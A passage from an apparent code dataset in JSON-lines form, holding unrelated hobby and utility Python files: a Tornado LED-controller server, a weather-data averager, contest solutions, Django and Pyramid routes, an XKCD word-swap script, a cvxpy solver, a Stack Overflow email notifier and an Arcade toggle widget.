fh.write(content)\n fh.close()\n\n def writePackageIndex(self):\n self.writeTemplate(\"index.xml\", \"index.html\", data=self.index.packages())\n \n def writePackages(self):\n for pkg in self.index.packages():\n self.writeTemplate(\"package.xml\", pkg.url, pkg=pkg, filter=Filter)\n\n def writeDefinitions(self):\n for defn in self.index.pages:\n self.writeTemplate(\"defn.xml\", defn.uri, d=defn, filter=Filter)\n\n def writeTypes(self):\n decls = []\n for package in self.index.packages():\n for defn in package.members(\"typedef\"):\n decls.append(defn)\n for inner in defn.members(\"typedef\"):\n decls.append(inner)\n \n decls.sort() \n self.writeTemplate(\"types.xml\", \"types.html\", data=decls)\n \n def writeHierarchy(self):\n classes = []\n for package in self.index.packages():\n for cls in package.members(\"typedef\"):\n if cls.tag == 'typedef':\n type = cls.el.attrib['type']\n if type == 'class':\n if not cls.inherits() and cls.visibility() != 'private':\n classes.append(cls)\n self.writeTemplate(\"hierarchy.xml\", \"hierarchy.html\", data=classes)\n\n def writeNamespaces(self):\n decls = []\n for package in self.index.packages():\n for defn in package.members(\"namespace\"):\n decls.append(defn)\n for inner in defn.members(\"namespace\"):\n decls.append(inner)\n \n decls.sort() \n self.writeTemplate(\"namespaces.xml\", \"namespaces.html\", data=decls)\n \n def writeTODO(self):\n items = sorted(self.index.undocPages.items(), key=lambda x:-x[1])\n self.writeTemplate(\"todo.xml\", \"todo.html\", undoc=items)\n\n# Strip the namespace off of all XML elements. This makes them much easier to work with.\ndef strip_xml_namespace(el):\n _, el.tag = el.tag.split('}')\n for child in el:\n strip_xml_namespace(child)\n\n# Return the 'outerHTML' of an element, with appropriate escaping. \ndef outer_html(el):\n result = []\n flatten(el, result)\n return Markup('').join(result)\n\n# Return the 'innerHTML' of an element, with appropriate escaping. 
\ndef inner_html(el):\n result = []\n flatten_children(el, result)\n return Markup('').join(result)\n\ndef flatten_children(el, result):\n if el.text: result.append(el.text)\n for child in el:\n flatten(child, result)\n if child.tail: result.append(child.tail)\n \ndef flatten(el, result):\n attrs = ''\n for key in el.attrib:\n attrs += ' %s=\"%s\"' % (key, el.attrib[key])\n result.append(Markup(\"<%s%s>\" % (el.tag, attrs)))\n flatten_children(el, result)\n result.append(Markup(\"%s>\" % el.tag))\n \ndef typeKind(el):\n if el.tag == 'typename':\n return el.attrib.get('type')\n elif el.tag == 'template-instance':\n return typeKind(el.find('typename'))\n else:\n return None\n\ndef typeid(el):\n tag = el.tag\n if tag == 'typename': return el.text\n elif el.tag == 'type-variable': return '%' + el.attrib['name']\n elif el.tag == 'array': return contentid(el) + '[]'\n elif el.tag == 'variadic': return contentid(el) + '...'\n elif el.tag == 'address': return 'Address[%s]' % contentid(el)\n elif el.tag == 'tuple': return '(%s)' % \",\".join(typeidlist(el.findall('*')))\n elif el.tag == 'union': return \" or \".join(typeidlist(el.findall('*')))\n elif el.tag == 'template-instance':\n return contentid(el) + '[%s]' % \",\".join(typeidlist(el.findall('template-arg/*')))\n else:\n assert False and ElementTree.tostring(el)\n\ndef typeidlist(els):\n return [typeid(el) for el in els]\n\ndef contentid(el):\n return typeid(list(el)[0])\n \n# Load the input XML file\ndoc = ElementTree.parse(options.infile)\nstrip_xml_namespace(doc.getroot())\n\n# Generate the index of all symbols\nsi = SymbolIndex(doc)\n\n# Generate all output files\nDocGenerator(si, options.cust).generate()\n","sub_path":"trunk/doc/api/doclobster.py","file_name":"doclobster.py","file_ext":"py","file_size_in_byte":23245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"22178841","text":"#!/usr/bin/env python\n\nimport socket\nimport time\nimport json\nimport enum\nimport array\n\n# for TCP Server\nfrom tornado.tcpserver import TCPServer\nfrom tornado.iostream import StreamClosedError\nfrom tornado import gen\n\n# for tornado webserver\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nimport tornado.websocket\nfrom tornado.options import define, options\n\nDEBUG = 1\n\nTCP_PORT = 4321\nTCP_INIT_PORT = 1234\n\nPRETZELBOARD_IPS = {}\nWS_CONNECTIONS = []\nwith open(\"./misc/programs.json\") as f:\n PROGRAMS = json.loads(f.read())\n\ndefine(\"port\", default=80, help=\"run on the given port\", type=int)\n\n# # [ms, cmd, lenH, lenL]\n# message_on_raw = [0, 1, 0, 1]\n# message_off_raw = [0, 0, 0, 1]\n# message_colorwipe_raw = [100, 2, 0, 1]\n\n# MESSAGE_ON = struct.pack(\"%dB\" % len(message_on_raw), *message_on_raw)\n# MESSAGE_OFF = struct.pack(\"%dB\" % len(message_off_raw), *message_off_raw)\n# MESSAGE_COLORWIPE = struct.pack(\"%dB\" % len(message_colorwipe_raw), *message_colorwipe_raw)\n\ndef main():\n init_server = TCPInitServer()\n init_server.listen(TCP_INIT_PORT)\n\n handlers = [\n (r\"/ws\", WsHandler),\n (r\"/\", tornado.web.RedirectHandler, {\"url\": \"./index.html\"}),\n (r\"/(.*)\", tornado.web.StaticFileHandler, {\"path\": \"./\"}),\n (r\"/js/(.*)\", tornado.web.StaticFileHandler, {\"path\": \"./js\"}),\n (r\"/css/(.*)\", tornado.web.StaticFileHandler, {\"path\": \"./css\"}),\n (r\"/img/(.*)\", tornado.web.StaticFileHandler, {\"path\": \"./img\"}),\n (r\"/misc/(.*)\", tornado.web.StaticFileHandler, {\"path\": \"./misc\"})\n ]\n\n # tornado.options.parse_command_line()\n application = tornado.web.Application(handlers)\n\n http_server = tornado.httpserver.HTTPServer(application)\n http_server.listen(options.port)\n\n loop = tornado.ioloop.IOLoop.current()\n\n loop.start()\n\n# converts program into pretzelbard commands\n# in: program as object\n# out: program for one led strip as bytestring as array\ndef convert_program(board_id, program):\n return_array = []\n first_array = []\n second_array = []\n third_array = []\n fourth_array = []\n fifth_array = []\n first_array.append(Modus[program['modus']].value)\n first_array.append(int(program['time']))\n return_array.append(first_array)\n for index, led in enumerate(program['strips'][int(board_id)]):\n \n if(index < 15):\n print(\"index: \" + str(index))\n for color in led:\n second_array.append(color)\n elif(index < 30):\n print(\"index: \" + str(index))\n for color in led:\n third_array.append(color)\n elif(index < 45):\n print(\"index: \" + str(index))\n for color in led:\n fourth_array.append(color)\n else:\n print(\"index: \" + str(index))\n for color in led:\n fifth_array.append(color)\n return_array.append(second_array)\n return_array.append(third_array)\n return_array.append(fourth_array)\n return_array.append(fifth_array)\n # encode\n for index, arrayy in enumerate(return_array):\n return_array[index] = array.array('B', arrayy).tostring()\n print(\"Return Array:\")\n print(return_array)\n return return_array\n\n# prints text if debugging is enabled in variable DEBUG\ndef debug(text):\n if DEBUG:\n print(text)\n\nclass Modus(enum.Enum):\n Off = 0\n On = 1\n Colorwipe = 2\n Normal = 3\n\n # handler for commands from web clients\nclass WsHandler(tornado.websocket.WebSocketHandler):\n\n def open(self):\n WS_CONNECTIONS.append(self)\n debug(\"Websocket opened\")\n\n def on_close(self):\n debug(\"websocket closed\")\n\n # respond on data from 
client\n def on_message(self, message):\n debug(\"Received message: \" + message)\n\n # process commands for LEDs/Pretzelboards\n if message.startswith(\"activate\"):\n program_id = message.split(\" \", 1)[1]\n program = PROGRAMS[int(program_id)]\n debug(\"Pretzelboard ips:\")\n debug(PRETZELBOARD_IPS)\n for board_id, board_ip in PRETZELBOARD_IPS.items():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((board_ip, TCP_PORT))\n converted_program = convert_program(board_id, program)\n for arrayy in converted_program:\n s.send(arrayy)\n time.sleep(.3)\n\n # override a program that got updated by client in list and json file\n elif message.startswith(\"update\"):\n program_id = message.split(\" \", 2)[1]\n program = message.split(\" \", 2)[2]\n PROGRAMS[int(program_id)] = json.loads(program)\n json_string = json.dumps(PROGRAMS)\n with open(\"./misc/programs.json\", \"w\") as f:\n f.write(json_string)\n\n # appends new program to list and writes new json file\n elif message.startswith(\"append\"):\n program = message.split(\" \", 2)[1]\n PROGRAMS.append(json.loads(program))\n json_string = json.dumps(PROGRAMS)\n print(\"Programs: \")\n print(PROGRAMS)\n with open(\"./misc/programs.json\", \"w\") as f:\n f.write(json_string)\n\n elif message.startswith(\"delete\"):\n program_id = message.split(\" \", 2)[1]\n del PROGRAMS[program_id]\n json_string = json.dumps(PROGRAMS)\n with open(\"./misc/programs.json\", \"w\") as f:\n f.write(json_string)\n\n\n# TCP server for connection initiation from pretzelbards\nclass TCPInitServer(TCPServer):\n @gen.coroutine\n def handle_stream(self, stream, address):\n while True:\n try:\n data = yield stream.read_bytes(3)\n pretzelboard_name = data.decode()[0]\n debug(\"Pretzelboard \" + pretzelboard_name + \" connected.\")\n pretzelboard_ip = address[0]\n debug(\"pretzelboard_ip: \" + pretzelboard_ip)\n PRETZELBOARD_IPS[pretzelboard_name] = pretzelboard_ip\n except StreamClosedError:\n break\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"tornado/tornado_server.py","file_name":"tornado_server.py","file_ext":"py","file_size_in_byte":6183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"306257345","text":"from collections import defaultdict\nfrom Utils import *\n\n\n\ndef getWeatherTransientModel(weather_point_list):\n #weather_dist_timestamp_dict = getWeatherDistTimesDict(weather_point_list)\n weather_timestamp_dist_dict = getWeatherTimesDistDict(weather_point_list)\n weather_transient_model = getAverageWeatherDataDictByTime(weather_timestamp_dist_dict)\n return weather_transient_model\n\n\n\ndef getAverageWeatherDataDictByTime(weather_timestamp_dist_dict):\n weather_timestamp_dict = {}\n for timestamp in sorted(weather_timestamp_dist_dict):\n temperature_list = []\n windspeed_list = []\n nsd_list = []\n visibility_list = []\n for dist in sorted(weather_timestamp_dist_dict [timestamp].keys()):\n temperature, windspeed, nsd, visibility = weather_timestamp_dist_dict [timestamp][dist]\n temperature_list.append(temperature)\n windspeed_list.append(windspeed)\n nsd_list.append(nsd)\n visibility_list.append(visibility)\n\n averageTemperature = sum(temperature_list)/len(temperature_list)\n averageWindSpeed = sum(windspeed_list)/len(windspeed_list)\n average_nsd = sum(nsd_list)/len(nsd_list)\n average_visibility = sum(visibility_list)/len(visibility_list)\n weather_timestamp_dict[timestamp] = (averageTemperature, averageWindSpeed, average_nsd, average_visibility)\n\n return weather_timestamp_dict\n\n\n\n\ndef getWeatherDistTimesDict(weather_point_list):\n weather_dist_timestamp_dict = defaultdict(lambda: defaultdict(float))\n\n for weather_point in weather_point_list:\n weather_dist = weather_point.getDistanceTravelled()\n weather_timestamp = weather_point.getWeatherTimestamp()\n weather_temperature = weather_point.getTemperature()\n weather_windspeed = weather_point.getWindSpeed()\n weather_dist_timestamp_dict[weather_dist][weather_timestamp] = (weather_temperature, weather_windspeed)\n\n return weather_dist_timestamp_dict\n\n\n\ndef getWeatherTimesDistDict(weather_point_list):\n weather_timestamp_dist_dict = defaultdict(lambda: defaultdict(float))\n\n for weather_point in weather_point_list:\n weather_dist = weather_point.getDistanceTravelled()\n weather_timestamp = weather_point.getWeatherTimestamp()\n weather_temperature = weather_point.getTemperature()\n weather_windspeed = weather_point.getWindSpeed()\n weather_nsd = weather_point.getNearestStormDistance()\n weather_visibility = weather_point.getVisiblity()\n weather_timestamp_dist_dict[weather_timestamp][weather_dist] = (weather_temperature, weather_windspeed, weather_nsd, weather_visibility)\n\n return weather_timestamp_dist_dict","sub_path":"data/WeatherService.py","file_name":"WeatherService.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"243955987","text":"from tqdm import tqdm\r\nfrom multiprocessing import Pool\r\n\r\nclass Test :\r\n def __init__(self,val,id):#,no_of_tags,tags):\r\n self.val=val\r\n self.id=id\r\n self.oren=val[0]\r\n self.no_of_tags=int(val[2])\r\n self.tags=val[4:-1]\r\n self.tagsList=self.tags.split(' ')\r\n\r\n\r\nfile = open('e.txt','r')\r\n\r\nno_of_lines = int(file.readline())\r\n\r\nfile = open('e.txt','r')\r\n\r\nn=no_of_lines\r\n\r\nmy_object = []\r\n\r\nd=file.readline()\r\nflag = False\r\ntmpobj = []\r\nvFlag=False\r\nfor f in range(no_of_lines):\r\n tmp =file.readline()\r\n if tmp[0] == 'V' and vFlag==True:\r\n n=n-1\r\n vFlag=False\r\n else:\r\n vFlag=True\r\n obj = Test(tmp,str(f))\r\n my_object.append(obj)\r\n\r\nN = len(my_object)\r\n\r\n\r\nmax = 0\r\nfor i in tqdm(range(N)):\r\n for j in range(i+1,N):\r\n common=list(set(my_object[i].tagsList).intersection(my_object[j].tagsList))\r\n if len(common)>0:\r\n if len(common)>max:\r\n my_object[i+1],my_object[j]=my_object[j],my_object[i+1]\r\n else:\r\n max = len(common)\r\n if i > (N-max):\r\n my_object[i + 1], my_object[j] = my_object[j], my_object[i + 1]\r\n else:\r\n my_object[max+len(common)], my_object[j] = my_object[j], my_object[max+len(common)]\r\n\r\n\r\n#######################################################################################################\r\n#Write the final file\r\n\r\nflag=False\r\np = 0\r\n\r\nnewfile = open('e_sol.txt', 'w')\r\nnewfile.write(str(n))\r\nnewfile.write('\\n')\r\n\r\nfor i in range(len(my_object)):\r\n if my_object[i].oren == 'V':\r\n if flag is False:\r\n p=my_object[i].id\r\n flag=True\r\n else:\r\n newfile.write(str(p) +\" \" + str(my_object[i].id))\r\n newfile.write('\\n')\r\n flag=False\r\n else:\r\n newfile.write(str(my_object[i].id))\r\n newfile.write('\\n')\r\n","sub_path":"Hash Code 2K19/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"452378140","text":"class Solution(object):\n def maximumSwap(self, num):\n s = list(str(num))\n\n i = 0\n while i < len(s) -1:\n if s[i] < s[i+1]:\n break\n i += 1\n if i == len(s) -1:\n return num\n max_idx, max_value = i+1, s[i+1]\n\n for j in range(i+1, len(s)):\n if s[j] >= max_value:\n max_idx, max_value = j, s[j]\n min_idx = i\n for j in range(i, -1, -1):\n if s[j] < max_value:\n min_idx = s[j]\n s[min_idx], s[max_idx] = s[max_idx], s[min_idx]\n return int(''.join(s))\n","sub_path":"practice_problems/Array_and_Strings/Maximum Swap.py","file_name":"Maximum Swap.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"526984010","text":"from django.urls import path\n\nfrom user import views\napp_name = 'T-user'\nurlpatterns = [\n # 用户中心\n path('home_page/', views.homeView, name='home_page'),\n # 用户的注册和登录\n path('login/', views.loginView, name='login'),\n path('register/', views.register, name='register'),\n path('register01/', views.register01, name='register01'),\n # 退出用户登录\n path('logout/', views.logoutView, name='logout'),\n]\n","sub_path":"Talented_Project/user/user_.py","file_name":"user_.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"514726553","text":"inTxt=open(r'input.txt',\"r\")\r\nreplacements=[\r\n #xkcd 1288\r\n ['witnesses','these dudes I know'],\r\n ['allegedly','kinda probably'],\r\n ['new study','Tumblr post'],\r\n ['rebuild','avenge'],\r\n ['space','spaaace'],\r\n ['google glass','virtual boy'],\r\n ['smartphone','Pokedex'],\r\n ['electric','atomic'],\r\n ['senator','Elf-Lord'],\r\n ['car','cat'],\r\n ['election','eating contest'],\r\n ['leader','river spirit'],\r\n ['homeland security','homestar runner'],\r\n ['could not be reached for comment','is guilty and everyone knows it'],\r\n #xkcd 1625\r\n ['debate','dance-off'],\r\n ['self-driving','uncontrollably swerving'],\r\n ['poll','psychic reading'],\r\n ['canidate','airbender'],\r\n ['drone','dog'],\r\n ['vows to',\"probably won't\"],\r\n ['at large','very large'],\r\n ['sucessfully','suddenly'],\r\n ['expands','physically expands'],\r\n [['first degree','second degree','third degree'],\"friggin' awful\"],\r\n ['an unknown number','like hundreds'],\r\n ['front runner','blade runner'],\r\n ['global','spherical'],\r\n ['years','minutes'],\r\n ['minutes','years'],\r\n ['no indication','lots of signs'],\r\n ['urged restraint by','drunkenly urged on'],\r\n ['horsepower','tons of horsemeat'],\r\n #xkcd 1679\r\n ['gaffe','magic spell'],\r\n ['ancient','haunted'],\r\n ['star-studded','blood-soaked'],\r\n ['remains to be seen','will never be known'],\r\n ['silver bullet','way to kill werewolves'],\r\n ['subway system','tunnels I found'],\r\n ['suprising','suprising (but not to me)'],\r\n ['war of words','interplanetary war'],\r\n ['tension','sexual tension'],\r\n ['cautiously optimistic','delusional'],\r\n ['doctor who','the Big Bang Theory'],\r\n ['win votes','find Pokemon'],\r\n ['behind the headlines','beyond the grave'],\r\n [['email','facebook post','tweet'],'poem'],\r\n ['facebook ceo','this guy'],\r\n ['lastest','final'],\r\n ['disrupt','destroy'],\r\n ['meeting','ménage à trois'],\r\n ['scientists','Channing Tatum and his friends'],\r\n [\"you won't belive\",\"I'm really sad about\"],\r\n #custom\r\n ['china','[CENSORED]'],\r\n ['chromebook','trashbook'],\r\n [['nuclear weapon','nuclear bomb','atomic bomb','hydrogen bomb'],'extinction ball'],\r\n ['russia','Putinland'],\r\n ['brexit','us being lazy'],\r\n [['united states','america',' us ',' usa ','united states of america','u.s.','u.s.a.'],'freedom eagle'],\r\n ['impeach','bully'],\r\n ['manager','overseer'],\r\n ['coup','party'],\r\n ['trial','PowerPoint presentation'],\r\n ['speaker','residential liar'],\r\n ['speak','complain'],\r\n ['testify','deny everything'],\r\n ['trump','tangerine'],\r\n ['article','kidney stone']\r\n ]\r\ntmp=''\r\nfor line in inTxt:\r\n tmp= str(line)\r\n for i in replacements:\r\n if isinstance(i[0],list):\r\n for e in i[0]:\r\n if (line.upper()).count(e.upper())>=1:\r\n tmp=((tmp.lower()).replace(e.lower(),i[1].lower()))\r\n break\r\n else:\r\n if (line.upper()).count(i[0].upper())>=1:\r\n tmp=((tmp.lower()).replace(i[0].lower(),i[1].lower()))\r\n print(tmp)\r\n\r\n","sub_path":"XKCD_substitution.py","file_name":"XKCD_substitution.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"635093552","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n# Copyright 2009 TUBITAK/UEKAE\n# Licensed under the GNU General Public License, version 2.\n# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt\n\nfrom pisi.actionsapi import autotools\nfrom pisi.actionsapi import pisitools\nfrom pisi.actionsapi import shelltools\nfrom pisi.actionsapi import get\n\nWorkDir=\"qtscriptgenerator-src-%s\" % get.srcVERSION()\n\ndef setup():\n shelltools.cd(\"generator\")\n shelltools.system(\"qmake-qt4 generator.pro\")\n shelltools.cd(\"../qtbindings\")\n shelltools.system(\"qmake-qt4 qtbindings.pro\")\n\ndef build():\n shelltools.cd(\"generator\")\n autotools.make(\"-j1\")\n shelltools.system(\"QTDIR=/usr/qt/4 ./generator --include-paths='/usr/qt/4/include/'\")\n\n shelltools.cd(\"../qtbindings\")\n autotools.make(\"-j1\")\n\ndef install():\n pisitools.insinto(\"/usr/qt/4/plugins/script\", \"plugins/script/*\")\n pisitools.insinto(\"%s/qtscriptgenerator\" % get.docDIR(), \"doc/*\")\n\n pisitools.dodoc(\"LICENSE.GPL\")\n","sub_path":"pardus/tags/2009-EOL/desktop/toolkit/qt/qtscriptgenerator/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"402554394","text":"import numpy as np, cvxpy as cp, numpy.random as random\n\n\ndef Solver(numVars, method=0):\n mOnes = np.ones(numVars)\n a = np.sort(random.uniform(-1, 1, numVars))\n\n p = cp.Variable(numVars)\n entropy = cp.sum(cp.entr(p))\n if method == 1:\n aSq = np.power(a, 2)\n aExp = 3 * np.power(a, 3) - 2 * a\n aLessPoint5 = [a < 0.5] * 1\n constraints = [p >= 0,\n cp.matmul(mOnes, p) == 1,\n p @ a <= 0.1,\n p @ a >= -0.1,\n p @ aSq >= 0.5,\n p @ aSq <= 0.6,\n p @ aExp >= -0.3,\n p @ aExp <= -0.2,\n p @ aLessPoint5 >= 0.3,\n p @ aLessPoint5 <= 0.4]\n else:\n constraints = [p >= 0, cp.matmul(mOnes, p) == 1]\n\n prob = cp.Problem(cp.Maximize(entropy), constraints)\n prob.solve()\n print(\"numVars = \", numVars, \"p.value=\", p.value)\n return a, p.value\n\n\ndef PartsRunner(filename, numRange, method=0):\n f = open(filename, \"w\")\n f.write(\"numVariables,p values->\\n\")\n f.close()\n\n for numVars in numRange:\n f = open(filename, \"a\")\n a, pVals = Solver(numVars, method)\n\n if pVals is not None:\n f.write(str(numVars) + \"-random-vals:\" + \",\")\n f.write(\",\".join(str(i) for i in a) + \"\\n\")\n f.write(str(numVars) + \"-probabilities:\" + \",\")\n f.write(\",\".join(str(i) for i in pVals) + \"\\n\")\n else:\n f.write(\"Equations Not Satisfied for matrix size:\"+str(numVars) + \"\\n\")\n f.close()\n\n\nif __name__ == \"__main__\":\n random.seed(8)\n numRange = range(2, 21, 2)\n filename = \"outputs/pVals6.1.txt\"\n PartsRunner(filename, numRange, 0)\n numRange = range(10, 31, 2)\n filename = \"outputs/pVals6.2.txt\"\n PartsRunner(filename, numRange, 1)\n","sub_path":"Question6.py","file_name":"Question6.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"217991000","text":"import logging\nfrom pyramid.view import view_config, notfound_view_config\nfrom pyramid.response import Response\n\n\ntextfiles = [\n{\n\n}\n]\n\n\n@view_config(route_name='textfile', renderer='json')\ndef get_textfile(request):\n name = request.matchdict['name']\n return textfiles[name]\n\n@view_config(route_name='textfiles', renderer='json')\ndef list_textfiles(request):\n return textfiles\n\n@view_config(route_name='home', renderer='json')\ndef my_view(request):\n return {'project': 'mathlete_pyr'}\n\n\n@notfound_view_config(renderer='json')\ndef not_found_error(request):\n request.response.status = 404\n return {'error': {\n 'code' : 404,\n 'message' : 'invalid request'\n }}","sub_path":"just_for_fun/mathlete_pyr/mathlete_pyr/controllers/math/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"353697995","text":"import argparse\nimport datetime\nimport json\nimport requests\nimport smtplib\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-c\", \"--config\", dest=\"config\",\n help=\"Read settings from FILE\", metavar=\"FILE\")\nparser.add_argument(\"-o\", \"--output\", dest=\"output\",\n help=\"Save question IDs to FILE\", metavar=\"FILE\")\n\nargs = parser.parse_args()\n\nfp = open(args.config, \"r\")\nconfig = json.load(fp)\nfp.close()\n\nfp = open(args.output, \"r\")\nquestion_ids = json.load(fp)\nfp.close()\n\nfrom_date = datetime.date.today() - datetime.timedelta(365)\nfrom_date = from_date.strftime(\"%s\")\n\nserver = smtplib.SMTP(\"smtp.gmail.com\", 587)\nserver.starttls()\nserver.login(config.get(\"username\"), config.get(\"passsword\"))\n\nfor term in config.get(\"terms\"):\n url = \"http://api.stackexchange.com/2.2\"\n query = {\n \"fromdate\": from_date,\n \"order\": \"desc\",\n \"site\": \"stackoverflow\"\n }\n\n headers = [\n \"From: \" + config.get(\"from\"),\n \"To: \" + config.get(\"to\"),\n ]\n\n if term.get(\"type\") == \"tag\":\n url += \"/questions\"\n query[\"tagged\"] = term.get(\"term\")\n else:\n url += \"/search\"\n query[\"intitle\"] = term.get(\"term\")\n\n response = requests.get(url, params=query)\n status = response.status_code\n body = response.json()\n\n if status != 200:\n headers.append(\"Subject: Stack Overflow API error \" + status)\n body = \"\\r\\n\".join(headers) + \"\\r\\n\\r\\n\" + body.get(\"error_message\")\n\n server.sendmail(config.get(\"from\"), config.get(\"to\"), body)\n\n continue\n\n for item in body.get(\"items\"):\n question_id = item.get(\"question_id\")\n\n if question_id in question_ids:\n continue\n\n headers.append(\"Subject: New Stack Overflow question mentioning \" + term.get(\"term\"))\n body = \"\\r\\n\".join(headers) + \"\\r\\n\\r\\n\" + item.get(\"link\")\n\n server.sendmail(config.get(\"from\"), config.get(\"to\"), body)\n\n question_ids.append(question_id)\n\nfp = open(args.output, \"w\")\njson.dump(question_ids, fp, indent=4)\nfp.close()\n\nserver.quit()\n","sub_path":"stackoverflow-notify.py","file_name":"stackoverflow-notify.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"164899436","text":"from typing import Optional\r\nfrom uuid import uuid4\r\n\r\nfrom PIL import Image, ImageDraw\r\n\r\nfrom arcade import Texture\r\nfrom arcade.gui import UIClickable\r\nfrom arcade.gui.ui_style import UIStyle\r\n\r\n\r\nclass UIAbstractToggle(UIClickable):\r\n _value: bool\r\n _true_texture: Optional[Texture]\r\n _false_texture: Optional[Texture]\r\n\r\n def __init__(\r\n self,\r\n value: bool = True,\r\n center_x: int = 0,\r\n center_y: int = 0,\r\n **kwargs):\r\n super().__init__(\r\n center_x=center_x,\r\n center_y=center_y,\r\n **kwargs\r\n )\r\n\r\n self.register_event_type('on_toggle')\r\n\r\n self._value = value\r\n\r\n @property\r\n def value(self) -> bool:\r\n \"\"\"\r\n current value\r\n \"\"\"\r\n return self._value\r\n\r\n @value.setter\r\n def value(self, value: bool):\r\n self._value = value\r\n self.dispatch_event('on_toggle', value)\r\n self.set_proper_texture()\r\n\r\n def set_proper_texture(self):\r\n preserve_scale = self.scale\r\n\r\n if self.value:\r\n self.texture = self._true_texture\r\n else:\r\n self.texture = self._false_texture\r\n\r\n self.scale = preserve_scale\r\n\r\n def toggle(self):\r\n \"\"\"\r\n Toggles current value (True => False, False => True)\r\n \"\"\"\r\n self.value = not self.value\r\n\r\n def on_click(self):\r\n self.value = not self.value\r\n\r\n def on_toggle(self, value):\r\n \"\"\"\r\n Called if value changes through programmatic change or user interaction.\r\n \"\"\"\r\n pass\r\n\r\n\r\nclass UIImageToggle(UIAbstractToggle):\r\n \"\"\"\r\n A toggle which can be `true` or `false`.\r\n\r\n Switches between two images. Useful for switches like fullscreen or sound mute/unmute.\r\n \"\"\"\r\n\r\n def __init__(self,\r\n true_texture: Texture,\r\n false_texture: Texture,\r\n center_x: int = 0,\r\n center_y: int = 0,\r\n value: bool = True,\r\n id: Optional[str] = None,\r\n style: UIStyle = None,\r\n **kwargs):\r\n \"\"\"\r\n :param true_texture: displayed if value is True\r\n :param false_texture: displayed if value is False\r\n :param center_x: center X of element\r\n :param center_y: center y of element\r\n :param value: initial value\r\n :param id: id of :py:class:`arcade.gui.UIElement`\r\n :param style: style of :py:class:`arcade.gui.UIElement`\r\n :param kwargs: catches unsupported named parameters\r\n \"\"\"\r\n super().__init__(\r\n center_x=center_x,\r\n center_y=center_y,\r\n value=value,\r\n id=id,\r\n style=style,\r\n **kwargs)\r\n self.style_classes.append('image-toggle')\r\n\r\n self._true_texture = true_texture\r\n self._false_texture = false_texture\r\n\r\n self.set_proper_texture()\r\n\r\n def render(self):\r\n self.set_proper_texture()\r\n\r\n\r\nclass UIToggle(UIAbstractToggle):\r\n \"\"\"\r\n A toggle which can be `true` or `false`.\r\n\r\n Style attributes:\r\n * color_true: color of the lever when value is `true`\r\n * bg_color_true: color of the background when value is `true`\r\n * color_false: color of the lever when value is `false`\r\n * bg_color_false: color of the background when value is `false`\r\n \"\"\"\r\n\r\n def __init__(self,\r\n center_x: int = 0,\r\n center_y: int = 0,\r\n height: int = 0,\r\n value: bool = True,\r\n id: Optional[str] = None,\r\n style: UIStyle = None,\r\n **kwargs):\r\n \"\"\"\r\n :param center_x: center X of element\r\n :param center_y: center y of element\r\n :param height: height of element, width depends on height\r\n :param value: initial value\r\n :param id: id of :py:class:`arcade.gui.UIElement`\r\n :param style: style of 
:py:class:`arcade.gui.UIElement`\r\n :param kwargs: catches unsupported named parameters\r\n \"\"\"\r\n super().__init__(\r\n center_x=center_x,\r\n center_y=center_y,\r\n value=value,\r\n id=id,\r\n style=style,\r\n **kwargs\r\n )\r\n self.style_classes.append('toggle')\r\n self._height = height\r\n\r\n self.render()\r\n\r\n @staticmethod\r\n def _round_corner(radius, fill):\r\n \"\"\"Draw a round corner\"\"\"\r\n corner = Image.new('RGBA', (radius, radius), (0, 0, 0, 0))\r\n draw = ImageDraw.Draw(corner)\r\n draw.pieslice((0, 0, radius * 2, radius * 2), 180, 270, fill=fill)\r\n return corner\r\n\r\n @staticmethod\r\n def _round_rectangle(size, radius, fill):\r\n \"\"\"Draw a rounded rectangle\"\"\"\r\n width, height = size\r\n rectangle = Image.new('RGBA', size, fill)\r\n corner = UIToggle._round_corner(radius, fill)\r\n rectangle.paste(corner, (0, 0))\r\n rectangle.paste(corner.rotate(90), (0, height - radius)) # Rotate the corner and paste it\r\n rectangle.paste(corner.rotate(180), (width - radius, height - radius))\r\n rectangle.paste(corner.rotate(270), (width - radius, 0))\r\n return rectangle\r\n\r\n def _render_toggle(self, right: bool, color, bg_color) -> Texture:\r\n height = self._height\r\n width = self._height * 2\r\n\r\n border_radius = height // 2\r\n radius = height * 0.42\r\n padding = radius * 0.16\r\n pos_y = height // 2\r\n pos_x = width - radius - padding if right else radius + padding\r\n\r\n # Scale to look pretty\r\n SCALE = 2\r\n width *= SCALE\r\n height *= SCALE\r\n border_radius *= SCALE\r\n radius *= SCALE\r\n padding *= SCALE\r\n pos_x *= SCALE\r\n pos_y *= SCALE\r\n\r\n # False\r\n switch = UIToggle._round_rectangle((width, height), border_radius, bg_color)\r\n d = ImageDraw.Draw(switch)\r\n d.ellipse((pos_x - radius, pos_y - radius, 